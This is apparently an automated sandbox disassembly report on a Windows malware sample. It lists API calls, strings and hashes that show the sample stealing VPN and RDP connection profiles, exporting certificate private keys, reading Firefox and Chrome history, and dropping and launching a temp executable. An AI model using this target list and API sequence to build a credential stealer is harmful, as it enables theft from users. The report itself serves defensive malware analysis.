• Instruction ID: edcb67239b6b68b93a48776e4fc6155eacee125f3c9669d6325235f45932fcaa
• Opcode Fuzzy Hash: 041190dec486dc00a696f8e4274d1a1c3cacc9eb9b54fbdfd046d7e1b3a2024b
• Instruction Fuzzy Hash: BA21B522A5869281E760AF5AE4403AEF361FB84B90F849431FF9E4B769DF3CD004C750

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: CertEnumStoreSystem
• String ID: ":{$"_":""
• API String ID: 4132996702-2026347918

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: CertEnumLocationStoreSystem
• String ID: "_": ""
• API String ID: 863500693-1453221996

Control-flow Graph
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: FileNamedPeekPipeRead
• String ID:
• API String ID: 327342812-0

Control-flow Graph
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
• String ID:
• API String ID: 2021502500-0

Control-flow Graph
control_flow_graph 682 7ff7cbca25b4-7ff7cbca25b7 683 7ff7cbca25da 682->683 684 7ff7cbca25b9-7ff7cbca25d9 GetProcessHeap RtlFreeHeap 682->684 684->683
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0

Control-flow Graph
control_flow_graph 685 7ff7cbca1a70-7ff7cbca1ab8 call 7ff7cbca1918 wvsprintfW
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: wvsprintf
• String ID:
• API String ID: 2795597889-0

Control-flow Graph
control_flow_graph 688 7ff7cbca79c4-7ff7cbca79d9 GetNativeSystemInfo 689 7ff7cbca79e7 688->689 690 7ff7cbca79db-7ff7cbca79e1 688->690 692 7ff7cbca79e9-7ff7cbca79ed 689->692 690->689 691 7ff7cbca79e3-7ff7cbca79e5 690->691 691->692
APIs
• GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF7CBCA74DE), ref: 00007FF7CBCA79CD
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
• Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
Similarity
• API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
• String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
• API String ID: 2508640211-1951492331
APIs
• CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA325E
• CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CBCA328D
• CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA32BB
  • Part of subcall function 00007FF7CBCA36F0: CryptExportKey.ADVAPI32 ref: 00007FF7CBCA3744
  • Part of subcall function 00007FF7CBCA36F0: CryptExportKey.ADVAPI32 ref: 00007FF7CBCA379E
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3336
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3380
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA33AC
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA33DC
• CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA3404
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA341C
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA343F
• CryptAcquireContextA.ADVAPI32 ref: 00007FF7CBCA3459
• CryptImportKey.ADVAPI32 ref: 00007FF7CBCA347E
• OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA34B5
• OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3505
• QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3523
• OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3532
• ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA355D
• ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA357C
• WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA359F
• NCryptExportKey.NCRYPT ref: 00007FF7CBCA3605
• CertOpenStore.CRYPT32 ref: 00007FF7CBCA3667
• CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF7CBCA3682
• CertSetCertificateContextProperty.CRYPT32 ref: 00007FF7CBCA369E
• PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CBCA36BD
                                                                                                                            • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CBCA36DF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                                            • String ID: -,0z$5)F$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$km{l
                                                                                                                            • API String ID: 2161712720-385819238
                                                                                                                            • Opcode ID: 75218921cc3421a315647877bddf5402e5b1d27b10d9dd8a73d73ab1dfe14f5f
                                                                                                                            • Instruction ID: ae87c4ee3059440fb8e593ef0657d4f88a3ca83d6d04778858a20a1a3804fedc
                                                                                                                            • Opcode Fuzzy Hash: 75218921cc3421a315647877bddf5402e5b1d27b10d9dd8a73d73ab1dfe14f5f
                                                                                                                            • Instruction Fuzzy Hash: 96E18D32B18A518AEB20DFA5E4546EEB7A1BB48798F804136EF4D17A68DF3CD109C750
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                                                            • String ID: <r;r$?r r$?r r
                                                                                                                            • API String ID: 199669925-2032818692
                                                                                                                            • Opcode ID: 7c3200e5b1162a59e3336203ad07deaebe161b4bdf8a21f308cab0b868f4c084
                                                                                                                            • Instruction ID: 2725614a151d2c9a4945bd1756cab02e9933a7a72f36c61e3883cd1193c7a3c6
                                                                                                                            • Opcode Fuzzy Hash: 7c3200e5b1162a59e3336203ad07deaebe161b4bdf8a21f308cab0b868f4c084
                                                                                                                            • Instruction Fuzzy Hash: F0A1E262B193A186EB20EF6AA4441AEB7A1FB85B90F904435FF4D47B68DF3CD404CB10
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                                                            • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                                                            • API String ID: 4154822446-3438982840
                                                                                                                            • Opcode ID: d7269cf17e5b33c1795cd74e29e03c46c3fcc247abef41597c81738ae3b3c5ab
                                                                                                                            • Instruction ID: 7eb6d6815c48e2eb840a4e401327f2b9555f07e48b0030d78361369698673b25
                                                                                                                            • Opcode Fuzzy Hash: d7269cf17e5b33c1795cd74e29e03c46c3fcc247abef41597c81738ae3b3c5ab
                                                                                                                            • Instruction Fuzzy Hash: C5317E21A6895795EF20EF28E8401ECB321FB447A4F805531EB5D866B8EF7CD609C760
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                                                            • String ID: "_": ""$%02X
                                                                                                                            • API String ID: 2879528921-1880646522
                                                                                                                            • Opcode ID: ed3753db07ca822bcdf5eb1dcea464b8db1005cad956ddba30dfc57e14472201
                                                                                                                            • Instruction ID: 6381b21cb0d82621204be191d0b1f6029b86583f9900d7515943ffb6df5854b7
                                                                                                                            • Opcode Fuzzy Hash: ed3753db07ca822bcdf5eb1dcea464b8db1005cad956ddba30dfc57e14472201
                                                                                                                            • Instruction Fuzzy Hash: 5DD18125B4862344EB24FFBAA8911FD93559F427E4BC46831FE1E476B6DE2CE505C320
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4035193891-0
                                                                                                                            • Opcode ID: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                                            • Instruction ID: 2285ad3153c1e8ec3d20ebf9eaceeb206452ac6247ea434b8ca897a8757c1492
                                                                                                                            • Opcode Fuzzy Hash: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                                            • Instruction Fuzzy Hash: 5821C2629287D186EA206F39A4441BEE790FB597A0F444236EFCD02B56DF2CC1148B10
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptExport$HeapProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 532797600-0
                                                                                                                            • Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                            • Instruction ID: 4c64412673d5c67ef531edd78247eaaea40d53e08cd506f3da49597a62e7ca26
                                                                                                                            • Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                            • Instruction Fuzzy Hash: 00218332A1965692EB60EF19F55036AB3A0EBC4BA8F409530FB5D877A4DF3CE5058B10
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2161876737-0
                                                                                                                            • Opcode ID: 063b78b404f5c96bf7d67d942382568fb73c345fad3f326a6c542ad15abcefa6
                                                                                                                            • Instruction ID: d4c6046b0308ddc5d347696d353386161d7125f346da47c226e1110c37c10c82
                                                                                                                            • Opcode Fuzzy Hash: 063b78b404f5c96bf7d67d942382568fb73c345fad3f326a6c542ad15abcefa6
                                                                                                                            • Instruction Fuzzy Hash: 6731A221A1866282EB34EF2AB85876DB691BB89BF1F844234EE5D077B4DF3CD4058610
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                                                            • String ID: %08X.exe$open
                                                                                                                            • API String ID: 2307396689-1771423410
                                                                                                                            • Opcode ID: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                                            • Instruction ID: bc22bdc9dacb4c5f79717b01a1c6cf1408bbb2fa178b1a6876831ecace2257cc
                                                                                                                            • Opcode Fuzzy Hash: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                                            • Instruction Fuzzy Hash: 7E31A472A58A959AE730DF24E8887EDA361FB88799F804135EB4D07968DF3CC60DC710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                                                            • String ID: Default$LOCALAPPDATA$\History
                                                                                                                            • API String ID: 3980575106-3555721359
                                                                                                                            • Opcode ID: a9490f531bca9e2a9df176b31feed2a3c8fdbf660a9032f732405aecd540a554
                                                                                                                            • Instruction ID: b7be00025489ff9f301fc98dad1984381a4233d518af88ffe46c56a5f85ceb46
                                                                                                                            • Opcode Fuzzy Hash: a9490f531bca9e2a9df176b31feed2a3c8fdbf660a9032f732405aecd540a554
                                                                                                                            • Instruction Fuzzy Hash: B2513422E18B9582E750EF28E5011AC7370F798794F459621EF8D53666EF34E6D9C310
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                                                                            • String ID: http
                                                                                                                            • API String ID: 948891078-2541227442
                                                                                                                            • Opcode ID: da779b66130cb05ef608860a343e0f9fb267a85ae6c6f153e63f2b0c7d92370d
                                                                                                                            • Instruction ID: 7f2a95367ed809eb812c62ff10a21b664470dcd6a2692b52cb664b83b223414e
                                                                                                                            • Opcode Fuzzy Hash: da779b66130cb05ef608860a343e0f9fb267a85ae6c6f153e63f2b0c7d92370d
                                                                                                                            • Instruction Fuzzy Hash: 75418332B18A5295EB20AF79E4503ADB7A0FB84B99F404536EB4D8AA78DF3CD544C310
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                                            • String ID: exit
                                                                                                                            • API String ID: 1626563136-1626635026
                                                                                                                            • Opcode ID: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                                                                            • Instruction ID: 2e9ef2f64ff315d7e1fbf3e064a0f43b944050b35b94edb632f75db1f3fb1445
                                                                                                                            • Opcode Fuzzy Hash: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                                                                            • Instruction Fuzzy Hash: 9B319322A1851281EBA0FF29D44627DA3A1EF84BA4FD41931FB0E865B9DF6CD845C320
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
